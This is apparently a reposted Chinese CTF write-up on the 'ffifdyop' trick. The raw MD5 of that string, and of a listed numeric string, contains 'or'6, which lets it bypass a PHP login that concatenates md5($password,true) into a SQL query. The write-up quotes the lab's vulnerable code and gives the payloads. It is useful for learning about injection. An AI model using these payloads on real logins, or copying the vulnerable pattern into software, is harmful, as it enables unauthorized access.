ffifdyop——繞過中一個奇妙的字符串


根據師傅們的博客總結如下:

ffifdyop

經過md5加密后:276f722736c95d99e921722cf9ed621c

再轉換為字符串:'or'6<亂碼>  即  'or'66�]��!r,��b

 

用途:

select * from admin where password=''or'6<亂碼>'

就相當於select * from admin where password=''or 1  實現sql注入

 

題目:實驗吧——md5繞過

鏈接:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php

 1、查看網頁源代碼 發現提示

 

$password=$_POST['password'];
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
$result=mysqli_query($link,$sql);
        if(mysqli_num_rows($result)>0){
            echo 'flag is :'.$flag;
        }
        else{
            echo '密碼錯誤!';
        } 

 

解釋一下md5這個函數:md5(string,raw)

 

md5(string,raw)

 

參數 描述
string 必需。規定要計算的字符串。
raw

可選。規定十六進制或二進制輸出格式:

  • TRUE - 原始 16 字符二進制格式
  • FALSE - 默認。32 字符十六進制數

不光有ffifdyop 還有 129581926211651571912466741651878684928 也可達同樣的效果

總之,相當於 select * from admin where password=''or ture

 

參考博客:https://blog.csdn.net/March97/article/details/81222922


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM